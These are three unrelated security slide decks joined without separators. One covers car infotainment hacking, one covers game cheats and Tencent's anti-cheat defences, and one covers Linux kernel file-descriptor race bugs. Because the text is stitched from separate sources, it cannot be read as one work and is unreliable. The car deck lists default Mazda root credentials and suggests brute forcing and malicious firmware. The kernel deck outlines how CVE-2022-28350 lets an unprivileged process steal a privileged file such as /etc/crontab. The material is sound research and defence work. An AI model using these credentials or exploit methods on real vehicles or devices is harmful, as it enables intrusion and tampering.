INFOTAINMENT CONSOLE
▸ Bluetooth
▸ Wi-Fi
▸ USB Ports
▸ SD Card Ports
▸ CD-ROM / DVD-ROM
▸ Touch screen and other inputs that allow you to control the console
▸ Audio Jack (hmmm maybe?)
▸ Cellular Connection, GPS, etc.
BLUETOOTH
▸ Bluetooth vulnerabilities
▸ Bluetooth jamming
▸ Code execution
(haven’t seen a PoC on an infotainment yet)
▸ Default bluetooth pairing numbers: “0000," “1111”, “1234"
▸ Malformed or Format String Vulnerabilities (Brick the Device)
▸ Memory corruption - send malformed packets to the head unit
BLUETOOTH CASE - FORMAT STRING
VULNERABILITIES THAT COULD LEAD TO
APPLICATION CRASH OR BRICKING OF YOUR
DEVICE
▸ Some Bluetooth stacks on infotainment systems can be crashed via %x
or %c format string specifiers in a device name, address book name,
song title, etc.
▸ CVE-2017-9212 was assigned to a BMW 330i 2011 car wherein a
researcher from IOActive renamed his device with format string
specifiers & connected his device via Bluetooth to his car which
eventually crashed his system.
▸ Warning! Bricks your system so test at your own risk
▸ WHAT IF it takes you to the desktop environment or debug options?
HERE ARE SOME PAYLOADS
YOU CAN TRY
WI-FI
▸ Wi-Fi deauthentication attacks
▸ Does the firmware update work
over the Internet? Try sniffing the traffic / replace it with a malicious
firmware
▸ Connect to WiFi -> Fetch DHCP IP Address -> Nmap -> what services does
it have? FTP, Telnet, SSH?
▸ Insecure Transmission of Credentials: Telnet and FTP for example
▸ Some of these interfaces have no auth: yes netcat is your friend :)
▸ Exploits for these services
WI-FI CASE: THOSE SERVICES!!!!
▸ Try brute forcing the credentials
- most of these have weak passwords
▸ Get to know the default password
of accessing the system
▸ ROOT pass?
▸ Mazda
- jci : root
- root : jci
- user : jci
WI-FI CASE: THOSE SERVICES!!!!
▸ Daan Keuper and Thijs Alkemade from Computest gained access to the
IVI system's root account for Volkswagen and Audi:
https://www.computest.nl/wp-content/uploads/2018/04/connected-car-
rapport.pdf
KEY TAKEAWAYS ABOUT THE RESEARCH
FROM COMPUTEST
WI-FI CASE: THOSE SERVICES!!!!
▸ Ian Tabor also showed an analysis of the IVI system within the 2015 DS5
1955 Limited Edition. He connected to the device over TCP port 23 (telnet)
without any authentication and executed commands.
USB
▸ Install apps or malicious apps
▸ Update the firmware via USB
▸ Remote Code Execution via the USB stack to IVI
▸ Killer USB - one that destroys your files
▸ Some systems support USB-to-ETHERNET adapters by default (another
way for your device to have an IP address)
USB CASE: MY CASE
▸ Owners of Mazda cars have been modding and installing apps to their
infotainment using MZD-AIO-TI (MZD All In One Tweaks Installer) in the
Mazda3Revolution forum since 2014.
USB CASE: MY CASE
▸ Got curious so read one of the details from a pdf that allows you to pull up data from CMU and
also analyze the app from Trez
▸ Reference:
https://github.com/shipcod3/mazda_getInfo/blob/master/cmu_pull_up_details/CMU%20data%20
pull%20tool%20instructions.pdf
USB CASE: MY CASE
USB CASE: MY CASE
USB CASE: MY CASE
▸ Our main focus is the text file
USB CASE: MY CASE
▸ Putting it all together for a PoC: https://github.com/shipcod3/mazda_getInfo/
USB CASE: MY CASE
USB CASE
▸ Researchers from Keen Security Lab also found local code execution via
the USB through an update
SD CARD SLOT & CD-ROM / DVD
ROM
▸ Basically the same thing with what’s discussed on the USB Port = load
something
SD CARD SLOT CASE
▸ For Mazda, using the known cmu bug, you can deploy apps via the SD
card: https://github.com/flyandi/mazda-custom-application-sdk
TOUCH SCREEN / INTERFACE
▸ Connect to WI-FI to establish IP address
▸ PRESS anything, multitask - cause an overflow
▸ Picture below from my uncle
IS THIS TRUE?
▸ NOPE! It’s just a joke
GSM, CELLULAR CONNECTION,
PHONE APP TO CAR, ETC
▸ Do you have an app that connects to your car? Time for some mobile app
testing
▸ Test the URLs you intercepted while testing the app:
https://www.troyhunt.com/controlling-vehicle-features-of-nissan/
▸ Eavesdrop on the connections
▸ Reverse engineer the app -> get the API keys?
RESPONSIBLE DISCLOSURE & BUG
BOUNTY PROGRAMS
▸ Fiat Chrysler Automobiles - https://bugcrowd.com/fca
▸ Tesla Motors - https://bugcrowd.com/tesla
▸ General Motors - https://hackerone.com/gm
AS REQUESTED…
VIDEO DEMO
REFERENCES
▸ The Car Hacker’s Handbook by Craig Smith: http://opengarages.org/handbook/ebook
▸ Memes from Google lol
▸ http://openmzdc.wikia.com/wiki/Getting_started
▸ https://mazdatweaks.com/
▸ Volkswagen and Audi Cars Vulnerable to Remote Hacking https://www.computest.nl/wp-
content/uploads/2018/04/connected-car-rapport.pdf
▸ https://www.bleepingcomputer.com/news/security/volkswagen-and-audi-cars-vulnerable-to-
remote-hacking/
▸ https://www.mintynet.com/
▸ https://github.com/shipcod3/mazda_getInfo/
▸ https://keenlab.tencent.com/en/Experimental_Security_Assessment_of_BMW_Cars_by_KeenLab.
pdf
▸ https://github.com/jaredthecoder/awesome-vehicle-security
TenProtect Confidential, Copyright @Tencent, 2019
The Art of Attack and Defense in Game Security
[email protected]
2019.02
About Me
• 2013–present: technical expert, Tencent Games business security department
• 2005–2012: architect at Trend Micro
• 2005–2008: designed and developed a PE virus sandbox
• 2008–2012: designed and developed a script vulnerability analysis engine
• 2013 to now: designs and develops generic game security solutions
• 2011.8: Defcon talk "Chinese phishing at Defcon19", Las Vegas
1. What Are Game Cheats
How many seconds does it take to finish Minesweeper?
CrossFire wallhack cheat
Note: to fit the mobile screen, cheats for the mobile version add aiming rays
CrossFire mobile wallhack cheat
The History of Cheats
• Single-player games: CheatEngine / FPE
• Online games
– Offline bots (WPE/WireShark)
– Speed hacks / damage multipliers (abnormal values)
– Wallhacks / aimbots (hooks, drivers)
– Room crashing / forced logins
• Gold-farming studios / paid top-ups / boosting services
• Mobile-game emulators
How China's Cheat Industry Operates Today
Distribution of Cheating Users in Chinese Online Games
• The more popular the game, the more cheating it attracts
• Some cheat software sells at a very high price
• The vast majority of cheaters are new players
• 60% of cheating happens in Internet cafés
• Driven by PUBG, FPS cheating is now extremely popular
The Explosion of FPS Cheating
• PUBG
• In 2018, more than 2,700 cheats were monitored
• At the peak, more than 100 cheats were updated every day
• FPS
• In 2018 there were roughly 60+ FPS survival games
• Cheats were found in every one of them
• APEX
• Over 10 million players within 72 hours of its 02-05 release
• More than 60 cheats already found on sale
"A BMW a Month" Is Not a Dream
2. A Discussion of Cheat Techniques
The Big Picture of Security
• Software vulnerabilities
– Game bugs, gold duplication
– Client-side logic without server-side validation
– Piracy
• Network security
– Packet tampering
– DDoS attacks
• Server and data security
– Server intrusion
– SQL injection / database rollback
Diablo III Bug: Gold Duplication
Memory-Modification Cheats
• Game object attributes
– HP, attack power, monsters, and so on
• Modifying or calling game logic
– Collision detection, auto-aim
• Game resource files
– Mobile / weakly-networked games
– Client-side effects
LOL model swap
Fortnite character ESP
Offline Bots / Protocol Simulation
• PC games
– Unreal Engine (open source)
– Cheat studios
• Web games
– Fiddler
• Mobile games
– Offline play
DDoS Attacks Against Tencent Games
• LOL:
– DDoS the server to crash it when a match is about to be lost
• QQCart:
– Floods of packets make the anti-cheat package fail to parse
• Gray industry:
– Small and mid-sized operators attack each other
Simulated Input
• Techniques
– SendMessage / SendInput / KbdClass
– Image recognition
– Simple state machines / deep-learning AI
• Uses
– Auto-aim / auto-fire
– AFK farming scripts
Synchronizer hardware
DNF farming studios
Note: can be bought on Taobao
3. Game Protection and the Security Arms Race
What Makes Game Security Special
• Players
– Demand enforcement
– Yet take their chances, or even assist cheats
• Game development and operations
– KPI-driven: engagement and revenue
• Studios
– Win by sheer volume
Fighting Cheats on the Product Side
• Reporting
– Video reports
– Malicious AFK reports
• Punishments
– Account bans / machine bans
– Kicking players
– Limiting rewards
– Lock-outs and mutes
Fighting Cheats on the Technical Side
• Generic detection
– Basic protection
– Samples
– Examples: EAC (Easy Anti-Cheat), BattlEye (at PUBG)
• Behavior detection
– Gains
– Damage
– Coordinates
Basic Protection
• Anti-debugging / packing / code obfuscation
– VMP
• Integrity checks
• Drivers
– VT-based protection (Tencent)
Sample-Based Protection
• Sample collection channels
– Low volume
• Analysis system capacity
– Relies on manual work
• Encryption and polymorphism of the samples themselves
– Signatures are hard to extract
• Safety of operating signatures in the wild
– Uncontrollable risk
Pipeline: suspicious sample collection → cheat identification → signature extraction → whitelist testing → confrontation monitoring → signature release
Behavior-Based Protection
• Game data
– Clear times / character attributes
– Coordinates
• Data mining
– Modification points, samples
– Match history
LOL Farming Studios
• LOL coordinates
• CNN
– 160*160, ResNet
• LSTM on coordinate sequences
Detecting Wallhacks with Image Recognition
gslab.qq.com
#BHUSA @BlackHatEvents
Devils Are in the File Descriptors:
It Is Time To Catch Them All
Le Wu from Baidu Security
Le Wu(@NVamous)
•
Focus on Android/Linux bug hunting and exploit
•
Found 200+ vulnerabilities in the last two years
•
Blackhat Asia 2022 speaker
About me
2
Outline
Background
Diving into issues in the fd export operations
Diving into issues in the fd import operations
Conclusion & Future work
3
Introduction to file descriptor: an integer in a process
Process A
fd:0
file object0
file object_n
file object1
fd:1
fd:n
…
read(fd, …), write(fd, …), ioctl(fd, …), mmap(fd, …), close(fd) …
Thread1
…
Thread_M
Background
…
User Space
Kernel Space
4
Process A
User Space
fd:0
file object0
Kernel Space
file object_n
file object1
fd:1
fd:n
…
…
read(fd, …), write(fd, …), ioctl(fd, …), mmap(fd, …), close(fd) …
Thread1
…
Thread_M
Background
fd_array
[0]
[1]
[n]
…
NULL
…
Introduction to file descriptor: an integer in a process
5
User Space
Kernel space
export operation
Introduction to file descriptor: fd export operation and import operation in kernel
import operation
Background
fd
file
fd
file
6
Process A
User Space
fd:0
file object0
Kernel Space
file object_n
file object1
fd:1
fd:n
…
…
read(fd, …), write(fd, …), ioctl(fd, …), mmap(fd, …), close(fd) …
Thread1
…
Thread_M
Background
fd_array
[0]
[1]
[n]
…
…
Introduction to file descriptor: fd export operation in kernel
[x]
file object_x
fd:x
Step1: get an unused fd
Step2: fd_array[fd]=file
Step3: pass fd to user space
7
Process A
User Space
fd:0
file object0
Kernel Space
file object_n
file object1
fd:1
fd:n
…
…
read(fd, …), write(fd, …), ioctl(fd, …), mmap(fd, …), close(fd) …
Thread1
…
Thread_M
Background
fd_array
[0]
[1]
[n]
…
…
Introduction to file descriptor: fd import operation in kernel
fd:x
[x]
file object_x
Step1: file=fd_array[x]
Step2: acquire file reference
8
User Space
Kernel space
file
fd
Step1:get an unused fd
Step2:fd_array[fd]=file
Step3:pass the fd to user space
Introduction to file descriptor: fd export operation and fd import operation
Step1:file=fd_array[fd]
Step2:acquire file reference
import operation
file
fd
export operation
Background
9
Process A
User Space
fd:0
file object0
Kernel Space
file object_n
file object1
fd:1
fd:n
…
…
read(fd, …), write(fd, …), ioctl(fd, …), mmap(fd, …), close(fd) …
Thread1
…
Thread_M
Background
fd_array
[0]
[1]
[n]
…
…
fd:x
[x]
file object_x
Introduction to file descriptor: user process close(fd)
10
Process A
User Space
fd:0
file object0
Kernel Space
file object1
fd:1
fd:n
…
…
read(fd, …), write(fd, …), ioctl(fd, …), mmap(fd, …), close(fd) …
Thread1
…
Thread_M
Background
fd_array
[0]
[1]
[n]
…
NULL
…
fd:x
[x]
Introduction to file descriptor: user process close(fd)
Step1: fd_array[fd]=NULL
Step2: drop file reference, set fd unused
file object_n
file object_x
11
Why file descriptor: Inspired by CVE-2021-0929
Import dma-buf fd to get a dma_buf file object
Map the memory buffer represented by the ion_handle into kernel space:
kernel_vaddr= ion_map_kernel(ion_client, ion_handle);
Reference the kernel_vaddr;
UAF
Thread A
Kernel space
Create a dma-buf fd with ION
sync.flag = DMA_BUF_SYNC_END;
ioctl(dma-buf fd, DMA_BUF_IOCTL_SYNC, &sync);
Thread B
User space
dma-buf fd
trigger the unmap
of kernel_vaddr
Background
Create an ion_handle related to the dma_buf file object;
Operations on fd and file
object or related objects
Operations on fd
12
A file descriptor can be shared between kernel space and user space, so race conditions can happen between kernel and user operations:
Background
Thread A
Thread B
User Space
Kernel space
Operations on
file object
Operations on fd
Race condition 1
Thread A
Thread B
User Space
Kernel space
Operations on fd
Operations on fd
Race condition 2
Maybe there are issues in these
race conditions? Let’s try to
construct such race conditions in
the fd export and import
operations!
Why file descriptor: Inspired by CVE-2021-0929
13
User Space
Kernel space
file
fd
Step1:get an unused fd
Step2:fd_array[fd]=file
Step3:pass the fd to user space
Step1:file=fd_array[fd]
Step2:acquire file reference
import operation
file
fd
export operation
Diving into issues in the fd export operation
14
Scenario of fd export operation
UAF caused by race condition
Find the issues
Fixes
Diving into issues in the fd export operation
15
User Space
Kernel space
file
Operations on fd:
read(fd, …);
write(fd, …);
ioctl(fd, …);
close(fd);
…
Request a resource
Thread A
Step1:get an unused fd
Step2:fd_array[fd]=file
Step3:pass the fd to user space
Scenario of fd export operation
fd
16
SYSCALL_DEFINE3(open, const char __user *, filename, int, flags, umode_t, mode)
{
…
return do_sys_open(AT_FDCWD, filename, flags, mode);
}
static long do_sys_openat2(int dfd, const char __user *filename,
struct open_how *how)
{
…
fd = get_unused_fd_flags(how->flags);
if (fd >= 0) {
struct file *f = do_filp_open(dfd, tmp, &op);
…
fd_install(fd, f);
…
}
…
return fd;
}
Example:
Step1:get an unused fd
get_unused_fd_flags()
Step2.fd_array[fd]=file:
fd_install(fd, file)
Step3.pass the fd to user space:
fd as return value
Scenario of fd export operation
…
17
But this regular fd export operation is executed sequentially, which is still far from the race conditions we want to see:
Thread A
Thread B
User Space
Kernel space
Operations on
file object
Operations on fd
Race condition 1
Thread A
Thread B
User Space
Kernel space
Operations on fd
Operations on fd
Race condition 2
Scenario of fd export operation
18
User Space
Kernel space
file
Request a resource
Thread A
Step1:get an unused fd
Step2:fd_array[fd]=file
Step3:pass the fd to user space
fd
After step 2, operations on the fd are already possible, but we only learn the fd's value after step 3!
UAF caused by race condition
Operations on fd:
read(fd, …);
write(fd, …);
ioctl(fd, …);
close(fd);
…
19
Hold on! Do we have to wait for the fd to be passed from the kernel to know its value?
Fd is predictable:
int fd = open(file_path, …);
close(fd);
int fd2 = open(file_path2,…);
For a new process, fds 0, 1, and 2 are usually occupied, so 3 will be the next fd exported from the kernel, and then 4, 5, 6…
• Assigned in ascending order
• Reused after close(fd)
fd2=fd
UAF caused by race condition
20
User Space
Kernel space
file
Thread A
Step1:get an unused fd
Step2:fd_array[fd]=file
Step3:pass the fd to user space
Thread B
We already know the value of the fd!
time window
Operations on fd:
read(fd, …);
write(fd, …);
ioctl(fd, …);
close(fd);
…
UAF caused by race condition
21
User Space
Kernel space
file
Thread A
Step1:get an unused fd
Step2:fd_array[fd]=file
Step3:return to user space
Thread B
More assumption:
time window Operations on file object
Operations on fd:
read(fd, …);
write(fd, …);
ioctl(fd, …);
close(fd);
…
We succeed in
constructing the case
of race condition 1
UAF caused by race condition
Thread A
Thread B
User Space
Kernel space
Operations on
file object
Operations on fd
Race condition 1
22
User Space
Kernel space
file
Thread A
Step1:get an unused fd
Step2:fd_array[fd]=file
Step3:return to user space
Thread B
A potential UAF scenario:
Operations on file object
close(fd);
file
file->private_data
file->private_data->…
release
UAF
drop file
reference
UAF caused by race condition
23
Looking for all kinds of kernel APIs which perform the “step2”:
Step2:fd_array[fd]=file
• fd_install(fd, file)
• anon_inode_getfd()
• dma_buf_fd()
• sync_fence_install()
• ion_share_dma_buf_fd()
• …
They all wrap fd_install(fd, file)
UAF caused by race condition
24
Try to search for the bug pattern: “reference file or related objects after the step2”
From Vendor Q:
static int get_fd(uint32_t handle, int64_t *fd)
{
int unused_fd = -1, ret = -1;
struct file *f = NULL;
struct context *cxt = NULL;
…
cxt = kzalloc(sizeof(*cxt), GFP_KERNEL);
…
unused_fd = get_unused_fd_flags(O_RDWR);
…
f = anon_inode_getfile(INVOKE_FILE, &invoke_fops, cxt, O_RDWR);
…
*fd = unused_fd;
fd_install(*fd, f);
((struct context *)(f->private_data))->handle = handle;
return 0;
…
}
From Vendor M:
int ged_ge_alloc(int region_num, uint32_t *region_sizes)
{
unsigned long flags;
int i;
struct GEEntry *entry =
(struct GEEntry *)kmem_cache_zalloc(gPoolCache, …);
…
entry->alloc_fd = get_unused_fd_flags(O_CLOEXEC);
…
entry->file = anon_inode_getfile("gralloc_extra",
&GEEntry_fops, entry, 0);
…
fd_install(entry->alloc_fd, entry->file);
return entry->alloc_fd;
…
}
UAF caused by race condition
My assumption is correct!
Let's try to search for more!
25
Issues I have found since the end of 2021:

From | CVE-id/issue | fd exported by function | Feature
Vendor M | CVE-2022-21771 | fd_install() | GPU related driver
Vendor M | CVE-2022-21773 | dma_buf_fd() | dma-buf related
Vendor M | Duplicated issue#1 | dma_buf_fd() | dma-buf related
Vendor Q | CVE-2022-33225 | fd_install() | -
Vendor S | Issue#1 | fd_install() | sync_file related
Vendor S | Issue#2 | dma_buf_fd() | dma-buf related
Linux Mainstream | Issue#1 | anon_inode_getfd() | AMD GPU driver
Linux Mainstream | Issue#2 | dma_buf_fd() | dma-buf related
ARM Mali GPU driver | CVE-2022-28349 | anon_inode_getfd() | can be triggered from untrusted apps
ARM Mali GPU driver | CVE-2022-28350 | fd_install() | sync_file related, can be triggered from untrusted apps

Maybe I should pay more attention to the GPU drivers?
UAF caused by race condition
26
CVE-2022-28349—— A Nday in ARM Mali GPU driver
Affect:
•Midgard GPU Kernel Driver: All versions from r28p0 – r29p0
•Bifrost GPU Kernel Driver: All versions from r17p0 – r23p0
•Valhall GPU Kernel Driver: All versions from r19p0 – r23p0
int kbase_vinstr_hwcnt_reader_setup(
struct kbase_vinstr_context *vctx,
struct kbase_ioctl_hwcnt_reader_setup *setup)
{
int errcode;
int fd;
struct kbase_vinstr_client *vcli = NULL;
…
errcode = kbasep_vinstr_client_create(vctx, setup, &vcli);
…
errcode = anon_inode_getfd(
"[mali_vinstr_desc]",
&vinstr_client_fops,
vcli,
O_RDONLY | O_CLOEXEC);
…
fd = errcode;
…
list_add(&vcli->node, &vctx->clients);
…
}
Android 10 devices of some vendors are affected!
UAF caused by race condition
27
static int kbase_kcpu_fence_signal_prepare(…)
{
struct sync_file *sync_file;
int ret = 0;
int fd;
…
sync_file = sync_file_create(fence_out);
…
fd = get_unused_fd_flags(O_CLOEXEC);
…
fd_install(fd, sync_file->file);
…
if (copy_to_user(u64_to_user_ptr(fence_info->fence), &fence,
sizeof(fence))) {
ret = -EFAULT;
goto fd_flags_fail;
}
return 0;
fd_flags_fail:
fput(sync_file->file);
…
return ret;
}
CVE-2022-28350—— A 0day in ARM Mali GPU driver
Affect:
Valhall GPU Kernel Driver: All versions from r29p0 – r36p0
Android 12 devices of some vendors are affected!
UAF caused by race condition
28
Exploit of CVE-2022-28350
My new exploit method
A known exploit method
The method won’t work on
Android because of SELinux
•
No need for KASLR、SMEP/SMAP 、 KCFI bypass
•
Read/write privileged files from unprivileged processes
(Details are put in the supplement part of the slides)
Given by Mathias Krause from grsecurity for a similar vulnerability CVE-2022-22942:
•
Bypass SELinux and work on the affected Android 12 devices
•
Write privileged files from untrusted apps
UAF caused by race condition
29
Find the issues
• fd_install(fd, file)
• anon_inode_getfd()
• dma_buf_fd()
• sync_fence_install()
• ion_share_dma_buf_fd()
• …
Check if the file or related objects are referenced after these functions:
They all wrap fd_install(fd, file)
30
Fixes
•
Don’t reference the file or related objects after step2 of fd export operation in kernel until return to user space
static long do_sys_openat2(int dfd, const char __user *filename,
struct open_how *how)
{
struct open_flags op;
int fd = build_open_flags(how, &op);
…
fd = get_unused_fd_flags(how->flags);
if (fd >= 0) {
struct file *f = do_filp_open(dfd, tmp, &op);
if (IS_ERR(f)) {
…
} else {
fsnotify_open(f);
fd_install(fd, f);
}
}
putname(tmp);
return fd;
}
return to user space directly
√:
31
Fixes
•
Reference the file object or related objects with lock protection, and share the lock in file_release of fd:
int fd_export_func(…) {
mutex_lock(g_lock);
fd_install(file, fd);
Reference file or related objects;
mutex_unlock(g_lock);
return fd;
}
int file_release(…) {
…
mutex_lock(g_lock);
…
mutex_unlock(g_lock);
…
}
close(fd)
√: (From vendor S)
void hpa_trace_add_task(void)
{
struct hpa_trace_task *task;
…
mutex_lock(&hpa_trace_lock);
…
task = kzalloc(sizeof(*task), GFP_KERNEL);
…
fd = get_unused_fd_flags(O_RDONLY | O_CLOEXEC);
…
task->file = anon_inode_getfile(name, &hpa_trace_task_fops, task, O_RDWR);
…
fd_install(fd, task->file);
list_add_tail(&task->node, &hpa_task_list);
mutex_unlock(&hpa_trace_lock);
…
}
static int hpa_trace_task_release(struct inode *inode, struct file *file)
{
struct hpa_trace_task *task = file->private_data;
…
mutex_lock(&hpa_trace_lock);
list_del(&task->node);
mutex_unlock(&hpa_trace_lock);
kfree(task);
return 0;
}
32
User Space
Kernel space
file
fd
Step1:get an unused fd
Step2:fd_array[fd]=file
Step3:pass the fd to user space
Step1:file=fd_array[fd]
Step2:acquire file reference
import operation
file
fd
export operation
Diving into issues in the fd import operation
33
Scenario of fd import operation
Fd type confusion caused by race condition
Find the issues
Fixes
Diving into issues in the fd import operation
34
Scenario of fd import operation
User Space
Kernel space
Operations on file
or related objects
Step1:file=fd_array[fd]
Step2:acquire file reference
file
fd
Operations on fd:
read(fd, …);
write(fd, …);
ioctl(fd, …);
close(fd);
…
Thread A
import operation
35
ssize_t ksys_write(unsigned int fd, const char __user *buf, size_t count)
{
struct fd f = fdget_pos(fd);
…
if (f.file) {
…
ret = vfs_write(f.file, buf, count, ppos);
…
fdput_pos(f);
}
…
}
SYSCALL_DEFINE3(write, unsigned int, fd, const char __user *, buf,
size_t, count)
{
return ksys_write(fd, buf, count);
}
Step1:file=fd_array[fd]
Step2:acquire file reference
Example:
Scenario of fd import operation
36
But this regular fd import operation is executed sequentially, which is still far from the race conditions we want to see:
Thread A
Thread B
User Space
Kernel space
Operations on
file object
Operations on fd
Race condition 1
Thread A
Thread B
User Space
Kernel space
Operations on fd
Operations on fd
Race condition 2
Scenario of fd import operation
Searching for all kinds of scenarios of fd import operation in kernel…
37
Fd type confusion caused by race condition
Special case1: CVE-2022-21772
TEEC_Result TEEC_RegisterSharedMemory(struct TEEC_Context *ctx,
struct TEEC_SharedMemory *shm)
{
int fd;
size_t s;
struct dma_buf *dma_buf;
struct tee_shm *tee_shm;
…
fd = teec_shm_alloc(ctx->fd, s, &shm->id);
…
dma_buf = dma_buf_get(fd);
close(fd);
…
tee_shm = dma_buf->priv;
…
shm->shadow_buffer = tee_shm->kaddr;
…
return TEEC_SUCCESS;
}
import the dma-buf fd to get the dma_buf
reference the “dma_buf->priv” as tee_shm
void *priv;
dma_buf
file
void *private_data;
tee_shm
create a specific dma-buf fd
38
Thread A
Thread B
User Space
Kernel space
Operations on fd
Operations on fd
Race condition 2
create a specific dma-buf fd
Import the dma-buf fd to get the dma_buf
reference the “dma_buf->priv” as tee_shm
Thread A
Kernel space
Special case1: CVE-2022-21772
Fd type confusion caused by race condition
39
Normally this is
safe in sequential
execution. But what
if a race condition
gets involved?
create a specific dma-buf fd:
fd = teec_shm_alloc(ctx->fd, s, &shm->id);
User Space
Kernel space
Import the dma-buf fd to get the dma_buf:
dma_buf = dma_buf_get(fd);
reference the “dma_buf->priv” as tee_shm:
tee_shm = dma_buf->priv;
fd type confusion happens!
Thread A
Thread B
Recreate the fd:
close(fd);
fd = create_a_diff_dma_buf_fd();
A kernel object
?
Special case1: CVE-2022-21772
void *priv;
dma_buf
file
void *private_data;
Fd type confusion caused by race condition
40
Special case2:
struct sync_file *internal_sync_fence_fdget(int fd)
{
struct file *file;
struct dma_fence *fence = sync_file_get_fence(fd);
/* Verify whether the fd is a valid sync file. */
if (unlikely(!fence))
return NULL;
dma_fence_put(fence);
file = fget(fd);
return file->private_data;
}
Import fd to get dma_fence object
Import fd again to get file object
Check the dma_fence object
struct dma_fence *fence;
sync_file
file
void *private_data;
dma_fence
Return “file->private_data” as sync_file for later use
Fd type confusion caused by race condition
41
Thread A
Thread B
User Space
Kernel space
Operations on fd
Operations on fd
Race condition 2
Thread A
Kernel space
Import fd to get dma_fence object
Import fd again to get file object
Check the dma_fence object
Return “file->private_data” as sync_file
for later use
Fd type confusion caused by race condition
Normally this is
safe in sequential
execution. But what
if a race condition
gets involved?
Special case2:
42
User Space
Kernel space
Thread A
Thread B
Recreate the fd:
close(fd);
fd = open();
Import fd to get dma_fence object:
struct dma_fence *fence = sync_file_get_fence(fd);
Import fd to get file object:
file = fget(fd);
Check the dma_fence object
Return “file->private_data” as sync_file for later use
A kernel object
?
fd type confusion happens!
file
void *private_data;
Fd type confusion caused by race condition
Special case2:
43
• Case1: fd time-of-create time-of-import
• Case2: fd double import
create a specific fd
import the fd to get a specific file
reference the “file->private_data” or other
file related private objects
import the fd to get a specific file
Kernel space
User space
recreate the fd
Kernel space
User space
recreate the fd
process the file for purpose A
process the file for purpose B
import the fd to get a specific file
fd type confusion
might happen!
Fd type confusion caused by race condition
44
The difficulty of fuzzing the fd type confusion caused by race condition:
The buggy code is lurking in kernel, the user process can barely notice it!
The race window can be tiny!
Maybe we can detect such issues at runtime with some detection code?
Are there more issues like these?
Find the issues
There are still two questions that need to be answered:
How to find these issues more effectively?
CVE-2022-21772
…
fd = teec_shm_alloc(ctx->fd, s, &shm->id);
…
dma_buf = dma_buf_get(fd);
close(fd);
…
45
enter syscall &
import
FD_UNUSED
FD_CREATED
FD_FIRST_USE
FD_IN_USER
fd_install(file,fd)
put_unused_fd()
syscall
return
syscall
return
close(fd)
Regular lifecycle of an fd:
Kernel space
User space
fd export
operation
Find the issues
46
Detecting the potential issues:
enter syscall &
import
FD_UNUSED
FD_CREATED
FD_FIRST_USE
FD_IN_USER
fd_install(file,fd)
put_unused_fd()
syscall
return
syscall
return
close(fd)
FD_SECOND_USE
import
import
fd Time-of-create
Time-of-import
import
fd double-import
syscall
return
Kernel space
User space
Source code:
https://github.com/yanglingxi1993/evil_fd_detect
Find the issues
47
Bug hunting result

type | From | CVE-id/issue | Found by
fd time-of-create time-of-import | Vendor M | CVE-2022-21772 | code auditing
fd time-of-create time-of-import | Vendor M | Issue#1 | detect tool
fd time-of-create time-of-import | Vendor M | Issue#2 | detect tool
fd time-of-create time-of-import | Vendor S | Issue#1 | code auditing
fd time-of-create time-of-import | Vendor Q | Issue#1 | detect tool
fd double import | Vendor M | CVE-2022-20082 | code auditing
fd double import | Vendor M | Issue#1 | detect tool
fd double import | Vendor M | Issue#2 | detect tool
fd double import | Vendor Q | Issue#1 | code auditing
fd double import | Vendor Q | Issue#2 | code auditing
fd double import | Vendor Q | Issue#3 | code auditing
48
• Case1: fd time-of-create time-of-import
• Case2: fd double import
create a specific fd
import the fd to get a specific file
reference the “file->private_data” or other
file related private objects
import the fd to get a specific file
Kernel space
User space
recreate the fd
Kernel space
User space
recreate the fd
process the file for purpose A
process the file for purpose B
import the fd to get a specific file
Fixes
create a specific file
reference the “file->private_data” or
other file related private objects
process the file for purpose A
process the file for purpose B
import the fd to get a specific file
fix
fix
49
fd export operation
Thread A
Thread B
User Space
Kernel space
Operations on
file object
Operations on fd
Race condition 1
UAF caused by
race condition
Are there any other
similar resources:
Predictable;
Export operation;
IDR
handle id
session id
object id
memory entry id
……
used as
Self-implementing
index
Conclusion & Future work
+
50
fd import operation
fd type confusion caused
by race condition
Are there any other
similar resources:
import operation;
IDR
Race condition 2
Operations on fd
Thread A
Thread B
User Space
Kernel space
Operations on fd
pid
user address
…
task_struct
vma
Conclusion & Future work
+
51
Acknowledgements
Thanks to 某因幡, Ye Zhang, Chenfu Bao, Shufan Yang, Lin Wu,
Yakun Zhang, Zheng Huang, Tim Xia
52
Supplement
Exploit of CVE-2022-28350
• UAF caused by race condition in fd export operation
• Fd type confusion caused by race condition in fd import operation
Small race windows can be exploitable!
53
static int kbase_kcpu_fence_signal_prepare(…)
{
…
struct sync_file *sync_file;
int ret = 0;
int fd;
…
sync_file = sync_file_create(fence_out);
…
fd = get_unused_fd_flags(O_CLOEXEC);
…
fd_install(fd, sync_file->file);
…
if (copy_to_user(u64_to_user_ptr(fence_info->fence), &fence,
sizeof(fence))) {
ret = -EFAULT;
goto fd_flags_fail;
}
return 0;
fd_flags_fail:
fput(sync_file->file);
…
return ret;
}
Exploit of CVE-2022-28350
What will CVE-2022-28350 lead to?
UAF in a race condition:
User Space
Kernel space
file
Thread A
Step1:get unused fd
Step2:fd_array[fd]=file
Step3:return to user space
Thread B
fput(sync_file->file)
close(fd);
UAF
mmap the “fence_info->fence” to
read-only memory
55
Exploit of CVE-2022-28350
But the CVE-2022-28350 can do more:
static int kbase_kcpu_fence_signal_prepare(…)
{
…
struct sync_file *sync_file;
int ret = 0;
int fd;
…
sync_file = sync_file_create(fence_out);
…
fd = get_unused_fd_flags(O_CLOEXEC);
…
fd_install(fd, sync_file->file);
…
if (copy_to_user(u64_to_user_ptr(fence_info->fence), &fence,
sizeof(fence))) {
ret = -EFAULT;
goto fd_flags_fail;
}
return 0;
fd_flags_fail:
fput(sync_file->file);
…
return ret;
}
A valid fd associated with an released file object
Kernel space
file
Thread A
Step1:get an unused fd
Step2:fd_array[fd]=file
Step3:return to user space
fput(sync_file->file)
file object1
fd_array
[0]
[1]
[fd]
file object0
file object_x
…
…
56
Exploit of CVE-2022-28350
So what if the released file object gets reused by some other privileged process when opening a privileged file?
Unprivileged Process A
Privileged Process B
file object1
fd_array
[0]
[1]
[fd]
file object0
file object_x
[0]
[1]
[fd2]
fd_array
int fd2=open(“/etc/crontab”, O_RDWR)
We succeed in “stealing” a
privileged file from others!
…
…
…
…
57
Exploit of CVE-2022-28350
If SELinux is disabled, the unprivileged process has the ability to read/write the "stolen" privileged file:
Unprivileged Process A
file object1
fd_array
[0]
[1]
[fd]
file object0
file object_x
read(fd, buf, buf_len);
write(fd, buf, buf_len);
/etc/crontab
-rw-r--r-- 1 root root 722 4月
6 2016 /etc/crontab
Is it strange that we can bypass the DAC of a privileged file to perform the read/write operation?
